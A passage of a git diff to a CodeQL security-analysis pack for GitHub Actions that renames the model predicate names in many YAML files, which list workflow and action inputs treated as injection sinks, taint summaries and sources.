["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index c641035f9662..b43253eb619a 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index adea8ae4bd2c..89559cf57e3f 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 857c946e2b78..6292841e56ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 717022ea6e83..9f98fd51139d 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 7dadb99209db..e04605511b89 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index ca3cb0091e90..a77181e6c4eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6faf8b900578..6c90e29a43bf 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 39b6773a2b19..6bacbc181daa 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index cbbce950b419..83d438d4e3d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 48206551bcd0..703a766cb4cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 256ad3f0e042..ecb4c809efe4 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index ae408b131e08..9b02577be7d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] @@ -9,6 +9,6 @@ extensions: - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index c7e2cf41b3f6..1ffc3df1c815 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 781384a2fe19..53ed1840b0a1 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 9036f199f424..17d2ed2e4735 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 7eee95dbcce4..68c2552c3505 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 4fe9e32ce521..977f6b98ae4b 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 0352ece87b52..616f7fdb9ca8 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index 712f2ce3395c..e4961ae5ed63 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 45c00c1c30ea..19cce83c691d 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index 8f05918155ed..f838eeed0eb8 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 708c310c05f4..48e5b05128f8 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 761776358994..448997b3136e 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 7106115c17a2..13af446f37d1 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 366e5dd17667..39e1c9ef6240 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a469063fc503..a442ed5cd531 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index d0d5b57574b5..a22fce01c453 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 3151e335d22d..74a5c7d592c7 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e74f953a1a15..e78dfb3b073d 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 0930fc246c38..29dac5cffeaa 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index 5b344799ad95..f2331633485c 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index 5b6f1342fc42..e492f6012788 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b34833d85f3a..a821b049232a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 9a58d9a764ff..4f9f887caf1f 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 74ef5820cb7a..365f3ac98f88 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index e05a3afd63a5..f42e84655338 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index a96ad45d624e..e21b52241667 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index a70e8facf7c1..6c4a5931b98f 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 66280f8bdd64..c7e89697afb6 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index 65965daeb1d4..aa8496038365 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ba9a04f588bf..ae869b6b5313 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index aea054e24b0a..9f5801b79c04 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index c8646cffe8ef..a4a473b8efd2 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index bb1c3ffca2a0..10a03e4d1863 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index d3bec5ea39d0..9af82b985f31 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index c65527150b5c..3b779d0b86d8 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 25565b445fca..6ad087730e41 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index d46a07dde969..fa9c19583524 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 2d162fbc9147..6bfaffb2bbab 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index fc91bacdb72d..03fa8beaf0b3 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index 